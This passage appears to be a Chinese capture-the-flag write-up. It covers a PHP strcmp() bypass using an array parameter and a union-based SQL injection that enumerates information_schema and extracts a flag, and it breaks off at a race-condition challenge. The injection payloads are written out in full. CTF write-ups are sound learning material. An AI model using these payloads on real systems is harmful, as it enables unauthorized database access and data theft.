easyweb 源码忘了脱下来,大概考察PHP strcmp()函数,直接数组绕过 ?password[]=shit 成绩单 白给题,Union注入无任何过滤,上来直接一血 id=-1' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()# //fl4g,sc id=-1' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='fl4g'# //flag id=-1' union select 1,flag,3,4 from fl4g# //flag{Sql_INJECT0N_4813drd8hz4} shop 考点:条件竞争 说实话一开始以……